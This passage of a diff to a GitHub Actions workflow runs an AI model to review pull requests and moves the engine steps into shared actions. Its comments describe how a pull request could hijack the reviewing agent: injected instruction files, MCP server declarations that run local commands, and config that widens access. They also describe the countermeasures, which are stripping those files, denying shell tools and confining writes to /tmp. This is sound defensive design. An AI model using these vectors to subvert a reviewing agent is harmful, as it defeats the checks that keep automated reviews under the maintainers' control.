+            LAST_REVIEWED_SHA=$(grep -oP '(?<=<!-- reviewed-commit: )[a-f0-9]+(?= -->)' \
+              /tmp/previous_review.txt | head -1 || true)
+            echo "last_reviewed_sha=$LAST_REVIEWED_SHA" >> "$GITHUB_OUTPUT"
+            echo "📋 Found previous review (last reviewed: ${LAST_REVIEWED_SHA:-unknown})"
           else
-            echo "" > /tmp/previous_review.txt
-            echo "has_previous=false" >> $GITHUB_OUTPUT
-            echo "last_reviewed_sha=" >> $GITHUB_OUTPUT
+            : > /tmp/previous_review.txt
+            echo "has_previous=false" >> "$GITHUB_OUTPUT"
+            echo "last_reviewed_sha=" >> "$GITHUB_OUTPUT"
+            echo "ℹ️ No previous review found"
           fi
 
-          # Delete old comments
-          gh api "repos/${REPO}/issues/${PR_NUMBER}/comments" \
-            --jq '.[] | select(.user.login == "github-actions[bot]" and (.body | contains("AI PR Review Complete"))) | .id' 2>/dev/null | \
-            xargs -I {} gh api "repos/${REPO}/issues/comments/{}" -X DELETE 2>/dev/null || true
+          # Delete ALL matches, legacy included — not just the newest one.
+          jq -r "$FILTER | .[].id" /tmp/all_comments.json \
+            | xargs -r -I {} gh api "repos/${REPO}/issues/comments/{}" -X DELETE
 
       - name: Fetch acknowledged suggestions
         id: acknowledged
@@ -245,11 +354,16 @@ jobs:
             # Previous review section (follow-up mode only)
             if [[ "$HAS_PREVIOUS" == "true" ]]; then
               echo "---PREVIOUS_REVIEW---"
-              sed \
-                -e '/^## 🤖 AI PR Review Complete$/d' \
+              # Strips this workflow's own header AND any superseded workflow's,
+              # so a follow-up review does not re-feed a stale header back to the
+              # agent (which may echo it and break the next run's parsing).
+              # `Review generated via .*` collapses the historical variants.
+              sed -E \
+                -e '/^## 🤖 (AI|Claude) PR Review Complete$/d' \
                 -e '/^\*\*Model:\*\*/d' \
-                -e '/^\*Review generated via AI Code Review Action\*$/d' \
+                -e '/^\*Review generated via .*\*$/d' \
                 -e '/^<!-- reviewed-commit:.*-->$/d' \
+                -e '/^<!-- deriv-pr-review *-->$/d' \
                 /tmp/previous_review.txt
               echo "---END_PREVIOUS_REVIEW---"
               echo ""
@@ -285,17 +399,18 @@ jobs:
             printf -- '- **Repository:** %s\n' "$REPO"
             echo ""
 
-            # Output format requirements — the header and metadata tag are required for
-            # follow-up review detection on subsequent runs (same mechanism as before)
+            # Output format — the header is for human readers only. Follow-up
+            # detection no longer depends on the model reproducing it: the post
+            # step appends the canonical <!-- deriv-pr-review --> marker and the
+            # reviewed-commit tag itself. Do NOT ask the model to emit those tags,
+            # or a compliant model plus the append yields two and the SHA grep
+            # returns two values.
             echo "## Review Output Format Requirements"
             echo "Begin your PR review comment with exactly this header (no extra text before it):"
             echo ""
             echo "## 🤖 AI PR Review Complete"
             echo ""
             printf '**Model:** \`%s\` | **Review Type:** %s\n' "$REVIEW_MODEL" "$REVIEW_TYPE"
-            echo ""
-            echo "End your comment with this hidden metadata tag on its own line — it is required for follow-up review detection on the next push:"
-            printf '<!-- reviewed-commit: %s -->\n' "$CURRENT_SHA"
 
           } > /tmp/review_context.md
 
@@ -316,136 +431,86 @@ jobs:
           [[ -s /tmp/pr_diff.txt ]] || { echo "❌ PR diff is empty"; exit 1; }
           echo "✅ PR diff fetched ($(wc -c < /tmp/pr_diff.txt) bytes)"
 
-      # ======================= ENGINE: Kimi Code CLI =======================
-      # Everything below (strip config, install, configure, run) is the engine.
-      # Replacing it is a rewrite of all four steps, not a config change.
+      # ======================== ENGINE DISPATCH ============================
+      # Exactly one step below runs. `uses:` accepts no expressions, so engine
+      # selection cannot be a single dynamic step — it is N if-gated steps with
+      # static refs. These gates and the `case` in "Resolve and validate engine"
+      # are two halves of one thing: adding an engine means editing both.
       #
-      # Contract any replacement engine MUST satisfy:
-      #   - strips every file in the checkout that the PR could use to alter the
-      #     engine's runtime BEFORE the engine starts: context/instruction files,
-      #     permission or sandbox config, and MCP server declarations. This is a
-      #     security boundary, and the file names are engine-specific — e.g.
-      #     Kimi reads .kimi-code/{mcp.json,local.toml}, Codex reads .codex/rules/.
-      #     Do not carry this step over unchanged.
-      #   - reads /tmp/review_context.md, /tmp/pr_diff.txt and the checked-out code
-      #   - writes the final review markdown to /tmp/ai_review_output.txt
-      #   - grants NO shell/command tool. Everything the review needs is already on
-      #     disk, so the agent cannot post a comment, reach the network, or depend on
-      #     the engine's command-pattern matching being argv-aware. The post step
-      #     below is what guarantees exactly one comment.
-      # ===================================================================
+      # Engines are referenced by absolute deriv-com/shared-actions path, NOT
+      # `./.github/actions/...`: inside a reusable workflow a local path resolves
+      # against the CALLER's repo, which would break every external consumer.
+      # Same house style as docsync-ai.yml. Note this also means a PR branch
+      # still pulls engines from @master — to test an engine change pre-merge,
+      # temporarily point these refs at @<branch> and revert before merging.
+      #
+      # `timeout-minutes` lives on these calling steps because it is not
+      # supported on steps inside a composite action. Keep the values in sync.
+      #
+      # Each engine owns: stripping PR-supplied agent config, its own CLI and
+      # sandbox config, and granting the model NO shell tool. Each reads
+      # review_context_path + pr_diff_path and writes output_path. None of them
+      # post comments — the post step below is the only thing that can.
+      # =====================================================================
 
-      - name: Strip PR-supplied agent config (Kimi Code)
-        # Instruction files (prompt injection) plus .kimi-code/ — project-level
-        # mcp.json there can declare MCP servers (arbitrary local commands, not
-        # gated by the Bash deny rule) and local.toml can widen workspace access.
-        run: |
-          rm -f CLAUDE.md AGENTS.md KIMI.md
-          rm -rf .kimi-code
-
-      - name: Set up Node.js
-        uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
-        with:
-          node-version: 22
-
-      - name: Install review CLI (Kimi Code)
-        env:
-          CLI_VERSION: ${{ inputs.cli_version || '0.34.0' }}
-        run: |
-          npm install -g "@moonshot-ai/kimi-code@${CLI_VERSION}"
-          kimi --version
-
-      - name: Configure review CLI (Kimi Code)
-        run: |
-          mkdir -p "$HOME/.kimi-code"
-
-          # Model + provider are defined entirely through the KIMI_MODEL_* env channel
-          # on the run step (no credentials written to disk); this config file only
-          # restricts the tool surface:
-          #   Read, Write(/tmp only), Grep, Glob — no Bash.
-          # The diff is pre-fetched to /tmp/pr_diff.txt, so the agent has no reason to
-          # run commands. Bash is left out of `enabled` AND denied by rule, so neither
-          # control has to be correct on its own.
-          cat > "$HOME/.kimi-code/config.toml" <<'EOF'
-          default_permission_mode = "auto"
-
-          [tools]
-          enabled = ["Read", "Write", "Grep", "Glob"]
-
-          # Rules are matched first-match-wins, before the mode default applies.
-          # Write is allowed only under /tmp (review output); everything else is
-          # denied so the agent cannot modify the checkout.
-          [[permission.rules]]
-          decision = "allow"
-          pattern = "Write(/tmp/*)"
-
-          [[permission.rules]]
-          decision = "deny"
-          pattern = "Write"
-
-          [[permission.rules]]
-          decision = "deny"
-          pattern = "Bash"
-          EOF
-
-          kimi doctor config
-
-      - name: Run AI PR review (Kimi Code)
+      - name: AI review (Kimi Code engine)
+        id: engine-kimi
+        if: steps.engine.outputs.engine == 'kimi'
         timeout-minutes: 60
-        env:
-          KIMI_MODEL_NAME: ${{ env.REVIEW_MODEL }}
-          KIMI_MODEL_API_KEY: ${{ secrets.LLM_API_KEY }}
-          KIMI_MODEL_BASE_URL: ${{ inputs.base_url || 'https://litellmsa.deriv.ai/v1' }}
-          KIMI_MODEL_MAX_CONTEXT_SIZE: ${{ inputs.max_context_size || '1048576' }}
-          KIMI_MODEL_PROVIDER_TYPE: kimi
-          KIMI_DISABLE_TELEMETRY: "1"
-          KIMI_CODE_NO_AUTO_UPDATE: "1"
-          CI: "1"
-        run: |
-          cat > /tmp/review_prompt.txt <<'EOF'
-          REPO: ${{ github.repository }}
-          PR NUMBER: ${{ github.event.pull_request.number }}
+        uses: deriv-com/shared-actions/.github/actions/ai_review_engine_kimi@master
+        with:
+          repository: ${{ github.repository }}
+          pr_number: ${{ github.event.pull_request.number }}
+          review_context_path: /tmp/review_context.md
+          pr_diff_path: /tmp/pr_diff.txt
+          output_path: ${{ env.REVIEW_OUTPUT_FILE }}
+          model: ${{ steps.engine.outputs.model }}
+          base_url: ${{ inputs.base_url || 'https://litellmsa.deriv.ai/v1' }}
+          api_key: ${{ secrets.LLM_API_KEY }}
+          max_context_size: ${{ inputs.max_context_size || '1048576' }}
+          cli_version: ${{ inputs.cli_version || '0.34.0' }}
 
-          Follow these steps:
+      - name: AI review (Anthropic / Claude Code engine)
+        id: engine-anthropic
+        if: steps.engine.outputs.engine == 'anthropic'
+        timeout-minutes: 60
+        uses: deriv-com/shared-actions/.github/actions/ai_review_engine_anthropic@master
+        with:
+          repository: ${{ github.repository }}
+          pr_number: ${{ github.event.pull_request.number }}
+          review_context_path: /tmp/review_context.md
+          pr_diff_path: /tmp/pr_diff.txt
+          output_path: ${{ env.REVIEW_OUTPUT_FILE }}
+          model: ${{ steps.engine.outputs.model }}
+          base_url: ${{ inputs.base_url || 'https://litellmsa.deriv.ai/v1' }}
+          api_key: ${{ secrets.LLM_API_KEY }}
 
-          1. Read /tmp/review_context.md — it contains full review instructions, PR context, previous review (if any), acknowledged suggestions to skip, and the required output format.
-
-          2. Read /tmp/pr_diff.txt — it contains the full diff for this PR (changed files and hunks), already fetched for you. You have no shell tool; everything you need is on disk.
-
-          3. For each changed file, use Read to open the full file — not just the diff hunk.
-             Full file context is required to understand the complete impact of each change.
-
-          4. For each changed file, identify and Read its dependencies:
-             - Imported modules, utilities, or shared helpers referenced in the changed code
-             - Type definitions, interfaces, or enums used by the changed code
-             - Parent components or callers if the changed file exports something modified
-             - Related test files (e.g. *.spec.ts, *.test.ts) to assess coverage gaps
-
-          5. After reading ALL files and dependencies, compile your complete review.
-             Write the ENTIRE review to /tmp/ai_review_output.txt using the Write tool.
-             The next step posts that file as a single PR comment.
-          EOF
-
-          # No GH_TOKEN in this step's env and no Bash tool in the config: the agent
-          # cannot reach the GitHub API at all, so the post step below is the only
-          # thing that can comment on the PR.
-          kimi -p "$(cat /tmp/review_prompt.txt)"
-
-      # ==================== END ENGINE: Kimi Code CLI ======================
+      # ====================== END ENGINE DISPATCH ==========================
 
       - name: Post review as single PR comment
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          CURRENT_SHA: ${{ steps.build-context.outputs.current_sha }}
         run: |
           PR_NUMBER="${{ github.event.pull_request.number }}"
 
-          if [ ! -f /tmp/ai_review_output.txt ] || [ ! -s /tmp/ai_review_output.txt ]; then
-            echo "❌ Review file missing or empty — the review agent did not write output"
+          if [ ! -s "$REVIEW_OUTPUT_FILE" ]; then
+            echo "❌ Review file $REVIEW_OUTPUT_FILE missing or empty — the '$REVIEW_ENGINE' engine ran but produced no output"
             exit 1
           fi
 
-          echo "📬 Posting review ($(wc -c < /tmp/ai_review_output.txt) bytes)..."
-          gh pr comment "$PR_NUMBER" --body-file /tmp/ai_review_output.txt
+          # Append the detection metadata here rather than asking the model to
+          # emit it. Dedup on the next push then depends on this step, not on LLM
+          # instruction-following: one reworded header used to mean the next run
+          # could not find its own previous comment, leaving a duplicate forever.
+          {
+            printf '\n'
+            printf '<!-- reviewed-commit: %s -->\n' "$CURRENT_SHA"
+            printf '<!-- deriv-pr-review -->\n'
+          } >> "$REVIEW_OUTPUT_FILE"
+
+          echo "📬 Posting review ($(wc -c < "$REVIEW_OUTPUT_FILE") bytes)..."
+          gh pr comment "$PR_NUMBER" --body-file "$REVIEW_OUTPUT_FILE"
           echo "✅ Review posted"
 
       - name: Emit review event to metrics dashboard
@@ -459,18 +524,26 @@ jobs:
           PR_NUMBER="${{ github.event.pull_request.number }}"
           REPO="${{ github.repository }}"
           TIMESTAMP=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
-          REVIEW_SIZE=$(wc -c < /tmp/ai_review_output.txt 2>/dev/null || echo "0")
+          REVIEW_SIZE=$(wc -c < "$REVIEW_OUTPUT_FILE" 2>/dev/null || echo "0")
 
+          # $METRICS_AGENT comes from "Resolve and validate engine" and is pinned
+          # per engine so migrating a repo onto this workflow keeps feeding the
+          # dashboard series it already had. payload.engine is the durable
+          # dimension: whatever the dashboard groups on today, the data needed to
+          # tell the engines apart is present.
           # Build the event payload with jq so all values are safely escaped
+          # Fallbacks because this step is `if: always()` and therefore also runs
+          # when "Resolve and validate engine" failed, leaving these env unset.
           EVENT_PAYLOAD=$(jq -n \
-            --arg agent "ai_review" \
+            --arg agent "${METRICS_AGENT:-ai_review}" \
             --arg event_type "$EVENT_TYPE" \
             --arg timestamp "$TIMESTAMP" \
             --arg pr_number "$PR_NUMBER" \
             --arg repo "$REPO" \
             --arg commit_sha "$CURRENT_SHA" \
             --argjson review_size_bytes "$REVIEW_SIZE" \
-            --arg model "$REVIEW_MODEL" \
+            --arg model "${REVIEW_MODEL:-unknown}" \
+            --arg engine "${REVIEW_ENGINE:-unknown}" \
             '{
               agent: $agent,
               event_type: $event_type,
@@ -480,7 +553,8 @@ jobs:
               payload: {
                 commit_sha: $commit_sha,
                 review_size_bytes: $review_size_bytes,
-                model: $model
+                model: $model,
+                engine: $engine
               }
             }')
 
@@ -488,12 +562,13 @@ jobs:
           echo "### AI Review Event" >> "$GITHUB_STEP_SUMMARY"
           echo "| Field | Value |" >> "$GITHUB_STEP_SUMMARY"
           echo "|---|---|" >> "$GITHUB_STEP_SUMMARY"
-          echo "| **agent** | \`ai_review\` |" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **agent** | \`${METRICS_AGENT:-ai_review}\` |" >> "$GITHUB_STEP_SUMMARY"
           echo "| **event_type** | \`$EVENT_TYPE\` |" >> "$GITHUB_STEP_SUMMARY"
           echo "| **pr_number** | \`$PR_NUMBER\` |" >> "$GITHUB_STEP_SUMMARY"
           echo "| **repo** | \`$REPO\` |" >> "$GITHUB_STEP_SUMMARY"
           echo "| **commit_sha** | \`$CURRENT_SHA\` |" >> "$GITHUB_STEP_SUMMARY"
-          echo "| **model** | \`$REVIEW_MODEL\` |" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **engine** | \`${REVIEW_ENGINE:-unknown}\` |" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **model** | \`${REVIEW_MODEL:-unknown}\` |" >> "$GITHUB_STEP_SUMMARY"
           echo "| **review_size_bytes** | $REVIEW_SIZE |" >> "$GITHUB_STEP_SUMMARY"
           echo "| **timestamp** | $TIMESTAMP |" >> "$GITHUB_STEP_SUMMARY"
           echo "" >> "$GITHUB_STEP_SUMMARY"
@@ -536,6 +611,11 @@ jobs:
         if: always()
         uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
         with:
-          name: ai-review-summary-${{ github.run_id }}
+          # Engine-derived so migrating a repo onto this workflow does not rename
+          # an artifact something outside this repo may be polling: the anthropic
+          # engine keeps emitting claude-review-summary-*. The `||` fallback
+          # matters because this step is `if: always()` and so also runs when the
+          # resolve step failed, and an empty artifact name is a hard error.
+          name: ${{ steps.engine.outputs.artifact_prefix || 'ai-review' }}-summary-${{ github.run_id }}
           path: click2fix-payload.json
           retention-days: 7

--- a/.github/workflows/ai-pr-review.yml
+++ b/.github/workflows/ai-pr-review.yml
@@ -1,0 +1,486 @@
+name: AI PR Review
+
+# LLM-agnostic PR review workflow.
+# The public interface (inputs, secrets, review marker, metrics event) is engine-neutral
+# so the underlying LLM engine can be swapped later. The current engine is Kimi Code CLI
+# (Kimi K3) — see the clearly-marked "engine" steps below. To substitute a different
+# engine, replace those steps and keep everything else unchanged.
+
+on:
+  workflow_call:
+    inputs:
+      model:
+        description: "Model ID to use for review (engine-specific; for the Kimi engine: k3, k3-256k, kimi-for-coding, kimi-for-coding-highspeed)"
+        required: false
+        default: "k3"
+        type: string
+      base_url:
+        description: "Base URL of the LLM API endpoint (default is the Deriv LiteLLM proxy; use https://api.kimi.com/coding/v1 for direct Kimi Code platform access)"
+        required: false
+        default: "https://litellmsa.deriv.ai/v1"
+        type: string
+      max_context_size:
+        description: "Maximum context window in tokens for the selected model (k3 = 1048576, k3-256k / kimi-for-coding = 262144)"
+        required: false
+        default: "1048576"
+        type: string
+      cli_version:
+        description: "Version of the review CLI to install (npm dist-tag or version; engine-specific)"
+        required: false
+        default: "latest"
+        type: string
+      prompt_gist_url:
+        description: "URL to fetch prompt template from"
+        required: false
+        default: "https://gist.githubusercontent.com/DerivFE/048e18e3d2e8c0cddf4c3f434835d57f/raw/claude-review-format.md"
+        type: string
+    secrets:
+      LLM_API_KEY:
+        description: "API key for the LLM engine (with the default LiteLLM base_url: a LiteLLM virtual key; with the direct Kimi endpoint: a Kimi Code Console key)"
+        required: true
+      AGENT_METRICS_API_URL:
+        description: "Base URL for the OneAboveAll metrics dashboard API (e.g. https://dashboard.example.com). Leave unset to skip POSTing events."
+        required: false
+      AGENT_METRICS_API_KEY:
+        description: "API key for authenticating POST requests to the metrics dashboard. Must match AGENT_METRICS_API_KEY on the backend. Required when AGENT_METRICS_API_URL is set."
+        required: false
+
+jobs:
+  ai-review:
+    runs-on:
+      group: github_claude_code_reviewer
+    if: github.event.pull_request.draft == false
+
+    permissions:
+      contents: read
+      pull-requests: write
+      issues: write
+      id-token: write
+      actions: write
+
+    concurrency:
+      group: ai-pr-review-${{ github.event.pull_request.number }}
+      cancel-in-progress: true
+
+    env:
+      REVIEW_MODEL: ${{ inputs.model || 'k3' }}
+
+    steps:
+      - name: Security Check - Validate User Access
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          ACTOR="${{ github.actor }}"
+          echo "🔒 Validating access for user: $ACTOR"
+
+          MEMBERSHIP=$(curl -s -H "Authorization: token $GH_TOKEN" \
+            "https://api.github.com/orgs/deriv-com/members/$ACTOR" -w "%{http_code}" -o /dev/null)
+          [[ "$MEMBERSHIP" == "204" ]] && echo "✅ Verified org member" && exit 0
+
+          COLLAB=$(curl -s -H "Authorization: token $GH_TOKEN" \
+            "https://api.github.com/repos/${{ github.repository }}/collaborators/$ACTOR" -w "%{http_code}" -o /dev/null)
+          [[ "$COLLAB" == "204" ]] && echo "✅ Verified collaborator" && exit 0
+
+          echo "❌ Access denied for user: $ACTOR" && exit 1
+
+      - name: Checkout PR head
+        uses: actions/checkout@v6
+        with:
+          repository: ${{ github.event.pull_request.head.repo.full_name }}
+          ref: ${{ github.event.pull_request.head.ref }}
+          fetch-depth: 20
+          token: ${{ secrets.GITHUB_TOKEN }}
+
+      - name: Fetch prompt template from Gist
+        id: fetch-prompt
+        env:
+          PROMPT_GIST_URL: ${{ inputs.prompt_gist_url || 'https://gist.githubusercontent.com/DerivFE/048e18e3d2e8c0cddf4c3f434835d57f/raw/claude-review-format.md' }}
+        run: |
+          PROMPT_TEMPLATE=$(curl -sL "$PROMPT_GIST_URL")
+          [[ -z "$PROMPT_TEMPLATE" ]] && echo "❌ Failed to fetch prompt" && exit 1
+
+          PROMPT_TEMPLATE=$(echo "$PROMPT_TEMPLATE" | sed '1s/^prompt:[[:space:]]*|[[:space:]]*//' | sed 's/^____$//g' | sed 's/____$//g')
+
+          printf '%s' "$PROMPT_TEMPLATE" > /tmp/prompt_template.txt
+          echo "✅ Prompt template saved ($(wc -c < /tmp/prompt_template.txt) bytes)"
+
+      - name: Capture and cleanup previous review
+        id: previous-review
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          REPO="${{ github.repository }}"
+          PR_NUMBER="${{ github.event.pull_request.number }}"
+
+          # Capture previous review before deleting
+          PREVIOUS=$(gh api "repos/${REPO}/issues/${PR_NUMBER}/comments" \
+            --jq '.[] | select(.user.login == "github-actions[bot]" and (.body | contains("AI PR Review Complete"))) | .body' 2>/dev/null || echo "")
+
+          if [ -n "$PREVIOUS" ]; then
+            echo "$PREVIOUS" > /tmp/previous_review.txt
+            echo "has_previous=true" >> $GITHUB_OUTPUT
+
+            # Extract the last reviewed commit SHA from the previous review metadata
+            LAST_REVIEWED_SHA=$(echo "$PREVIOUS" | grep -oP '(?<=<!-- reviewed-commit: )[a-f0-9]+(?= -->)' || echo "")
+            echo "last_reviewed_sha=$LAST_REVIEWED_SHA" >> $GITHUB_OUTPUT
+          else
+            echo "" > /tmp/previous_review.txt
+            echo "has_previous=false" >> $GITHUB_OUTPUT
+            echo "last_reviewed_sha=" >> $GITHUB_OUTPUT
+          fi
+
+          # Delete old comments
+          gh api "repos/${REPO}/issues/${PR_NUMBER}/comments" \
+            --jq '.[] | select(.user.login == "github-actions[bot]" and (.body | contains("AI PR Review Complete"))) | .id' 2>/dev/null | \
+            xargs -I {} gh api "repos/${REPO}/issues/comments/{}" -X DELETE 2>/dev/null || true
+
+      - name: Fetch acknowledged suggestions
+        id: acknowledged
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          REPO="${{ github.repository }}"
+          PR_NUMBER="${{ github.event.pull_request.number }}"
+
+          echo "🔍 Scanning for Click2Fix - Acknowledge comments..."
+
+          # Find comments containing "Click2Fix - Acknowledge" and extract bullet points
+          ACKNOWLEDGE_COMMENT=$(gh api "repos/${REPO}/issues/${PR_NUMBER}/comments" \
+            --jq '.[] | select(.body | contains("Click2Fix - Acknowledge")) | .body' 2>/dev/null || echo "")
+
+          if [ -n "$ACKNOWLEDGE_COMMENT" ]; then
+            echo "✅ Found acknowledge comment"
+
+            # Extract bullet points (lines starting with - or *) using printf for safer handling
+            ACKNOWLEDGED_ITEMS=$(printf '%s\n' "$ACKNOWLEDGE_COMMENT" | grep -E '^\s*[-*]\s+' | sed 's/^\s*[-*]\s*//' || echo "")
+
+            if [ -n "$ACKNOWLEDGED_ITEMS" ]; then
+              printf '%s\n' "$ACKNOWLEDGED_ITEMS" > /tmp/acknowledged_items.txt
+              echo "has_acknowledged=true" >> $GITHUB_OUTPUT
+              echo "📋 Acknowledged items:"
+              printf '%s\n' "$ACKNOWLEDGED_ITEMS"
+            else
+              echo "" > /tmp/acknowledged_items.txt
+              echo "has_acknowledged=false" >> $GITHUB_OUTPUT
+              echo "ℹ️ No bullet items found in acknowledge comment"
+            fi
+          else
+            echo "" > /tmp/acknowledged_items.txt
+            echo "has_acknowledged=false" >> $GITHUB_OUTPUT
+            echo "ℹ️ No Click2Fix - Acknowledge comment found"
+          fi
+
+      - name: Build review context
+        id: build-context
+        env:
+          HAS_PREVIOUS: ${{ steps.previous-review.outputs.has_previous }}
+          HAS_ACKNOWLEDGED: ${{ steps.acknowledged.outputs.has_acknowledged }}
+          LAST_REVIEWED_SHA: ${{ steps.previous-review.outputs.last_reviewed_sha }}
+          PR_TITLE: ${{ github.event.pull_request.title }}
+          PR_AUTHOR: ${{ github.event.pull_request.user.login }}
+          PR_BRANCH: ${{ github.event.pull_request.head.ref }}
+        run: |
+          PR_NUMBER="${{ github.event.pull_request.number }}"
+          REPO="${{ github.repository }}"
+
+          # Compute click2fix URL
+          PR_URL="https://github.com/$REPO/pull/$PR_NUMBER"
+          PR_HASH=$(echo -n "$PR_URL" | base64 -w0 | tr '+/' '-_' | tr -d '=')
+          CLICK2FIX_URL="https://click2fix.internal-gcp-ai-agents.deriv.dev/?hash=${PR_HASH}"
+
+          # Store current HEAD SHA (used in review comment metadata + metrics)
+          CURRENT_SHA=$(git rev-parse HEAD)
+          echo "$CURRENT_SHA" > /tmp/current_sha.txt
+          echo "current_sha=$CURRENT_SHA" >> $GITHUB_OUTPUT
+          echo "📌 Current HEAD: $CURRENT_SHA"
+
+          [[ "$HAS_PREVIOUS" == "true" ]] && REVIEW_TYPE="🔄 Follow-up Review" || REVIEW_TYPE="📋 Initial Review"
+          [[ "$HAS_PREVIOUS" == "true" ]] && EVENT_TYPE="followup_review" || EVENT_TYPE="initial_review"
+          echo "event_type=$EVENT_TYPE" >> $GITHUB_OUTPUT
+
+          # Noise pattern for incremental diff filtering — same set as before
+          NOISE_PATTERN='package-lock\.json|yarn\.lock|pnpm-lock\.yaml|\.snap|\.min\.js|\.min\.css|dist/|build/|\.generated\.|__generated__|/vendor/|\.pb\.go|_test\.snap|\.spec\.(tsx?|jsx?)|/__tests__/|\.scss$|\.md$'
+
+          # Pre-compute incremental diff (changes since last review) for follow-up mode
+          echo "" > /tmp/incremental_diff.txt
+          if [[ "$HAS_PREVIOUS" == "true" && -n "$LAST_REVIEWED_SHA" ]]; then
+            echo "📋 Generating incremental diff since last reviewed commit: $LAST_REVIEWED_SHA"
+            if git cat-file -e "$LAST_REVIEWED_SHA" 2>/dev/null; then
+              git diff "$LAST_REVIEWED_SHA"..HEAD | awk -v noise="$NOISE_PATTERN" '
+                /^diff --git / { in_noise = ($0 ~ noise); if (!in_noise) print; next }
+                !in_noise { print }
+              ' > /tmp/incremental_diff.txt
+              [ -s /tmp/incremental_diff.txt ] && echo "✅ Incremental diff generated" || echo "ℹ️ No changes since last reviewed commit"
+            else
+              echo "⚠️ Last reviewed commit $LAST_REVIEWED_SHA not found in history (fetch-depth may be too shallow)"
+            fi
+          fi
+
+          # Build the full context file that the review agent will read
+          {
+            # System instructions from gist with click2fix URL injected
+            sed "s|{{AUTO_FIX_URL}}|${CLICK2FIX_URL}|g" /tmp/prompt_template.txt
+            echo ""
+
+            # Previous review section (follow-up mode only)
+            if [[ "$HAS_PREVIOUS" == "true" ]]; then
+              echo "---PREVIOUS_REVIEW---"
+              sed \
+                -e '/^## 🤖 AI PR Review Complete$/d' \
+                -e '/^\*\*Model:\*\*/d' \
+                -e '/^\*Review generated via AI Code Review Action\*$/d' \
+                -e '/^<!-- reviewed-commit:.*-->$/d' \
+                /tmp/previous_review.txt
+              echo "---END_PREVIOUS_REVIEW---"
+              echo ""
+
+              # Incremental diff section — helps the agent identify what was explicitly fixed
+              if [ -s /tmp/incremental_diff.txt ]; then
+                echo "---INCREMENTAL_DIFF---"
+                echo "The following diff shows ONLY the changes made since the last review. Use this to confirm what was explicitly fixed."
+                echo "If a pattern appears on a \`-\` line here it was removed. If it does not appear here at all, it was not touched."
+                echo '```diff'
+                cat /tmp/incremental_diff.txt
+                echo '```'
+                echo "---END_INCREMENTAL_DIFF---"
+                echo ""
+              fi
+            fi
+
+            # Acknowledged suggestions — skip these entirely in the review
+            if [[ "$HAS_ACKNOWLEDGED" == "true" ]]; then
+              echo "---ACKNOWLEDGED_SUGGESTIONS---"
+              echo "The following suggestions have been acknowledged by the developer and must NOT be included in your review. Do not mention or suggest these items again:"
+              cat /tmp/acknowledged_items.txt
+              echo "---END_ACKNOWLEDGED_SUGGESTIONS---"
+              echo ""
+            fi
+
+            # PR metadata
+            printf '## Pull Request Information\n'
+            printf -- '- **Title:** %s\n' "$PR_TITLE"
+            printf -- '- **Author:** %s\n' "$PR_AUTHOR"
+            printf -- '- **Branch:** %s\n' "$PR_BRANCH"
+            printf -- '- **PR Number:** %s\n' "$PR_NUMBER"
+            printf -- '- **Repository:** %s\n' "$REPO"
+            echo ""
+
+            # Output format requirements — the header and metadata tag are required for
+            # follow-up review detection on subsequent runs (same mechanism as before)
+            echo "## Review Output Format Requirements"
+            echo "Begin your PR review comment with exactly this header (no extra text before it):"
+            echo ""
+            echo "## 🤖 AI PR Review Complete"
+            echo ""
+            printf '**Model:** \`%s\` | **Review Type:** %s\n' "$REVIEW_MODEL" "$REVIEW_TYPE"
+            echo ""
+            echo "End your comment with this hidden metadata tag on its own line — it is required for follow-up review detection on the next push:"
+            printf '<!-- reviewed-commit: %s -->\n' "$CURRENT_SHA"
+
+          } > /tmp/review_context.md
+
+          echo "📋 Review context built ($(wc -c < /tmp/review_context.md) bytes)"
+
+      - name: Remove agent config files to prevent project config leaking into review
+        run: rm -f CLAUDE.md AGENTS.md
+
+      # ======================= ENGINE: Kimi Code CLI =======================
+      # Everything below (install, configure, run) is the swappable engine.
+      # To substitute a different LLM engine, replace these three steps with
+      # the equivalent install/configure/run for that engine. Contract:
+      #   - reads /tmp/review_context.md and the checked-out PR code
+      #   - writes the final review markdown to /tmp/ai_review_output.txt
+      #   - does NOT post PR comments itself
+      # ===================================================================
+
+      - name: Set up Node.js
+        uses: actions/setup-node@v4
+        with:
+          node-version: 22
+
+      - name: Install review CLI (Kimi Code)
+        env:
+          CLI_VERSION: ${{ inputs.cli_version || 'latest' }}
+        run: |
+          npm install -g "@moonshot-ai/kimi-code@${CLI_VERSION}"
+          kimi --version
+
+      - name: Configure review CLI (Kimi Code)
+        run: |
+          mkdir -p "$HOME/.kimi-code"
+
+          # Model + provider are defined entirely through the KIMI_MODEL_* env channel
+          # on the run step (no credentials written to disk); this config file only
+          # restricts the tool surface:
+          #   Read, Write, Bash(gh pr diff:*), Bash(gh pr view:*)
+          # Grep/Glob stay available as read-only exploration helpers.
+          cat > "$HOME/.kimi-code/config.toml" <<'EOF'
+          default_permission_mode = "auto"
+
+          [tools]
+          enabled = ["Read", "Write", "Bash", "Grep", "Glob"]
+
+          [[permission.rules]]
+          decision = "allow"
+          pattern = "Bash(gh pr diff*)"
+
+          [[permission.rules]]
+          decision = "allow"
+          pattern = "Bash(gh pr view*)"
+
+          [[permission.rules]]
+          decision = "deny"
+          pattern = "Bash"
+          EOF
+
+          kimi doctor config
+
+      - name: Run AI PR review (Kimi Code)
+        timeout-minutes: 60
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          KIMI_MODEL_NAME: ${{ env.REVIEW_MODEL }}
+          KIMI_MODEL_API_KEY: ${{ secrets.LLM_API_KEY }}
+          KIMI_MODEL_BASE_URL: ${{ inputs.base_url || 'https://litellmsa.deriv.ai/v1' }}
+          KIMI_MODEL_MAX_CONTEXT_SIZE: ${{ inputs.max_context_size || '1048576' }}
+          KIMI_MODEL_PROVIDER_TYPE: kimi
+          KIMI_DISABLE_TELEMETRY: "1"
+          KIMI_CODE_NO_AUTO_UPDATE: "1"
+          CI: "1"
+        run: |
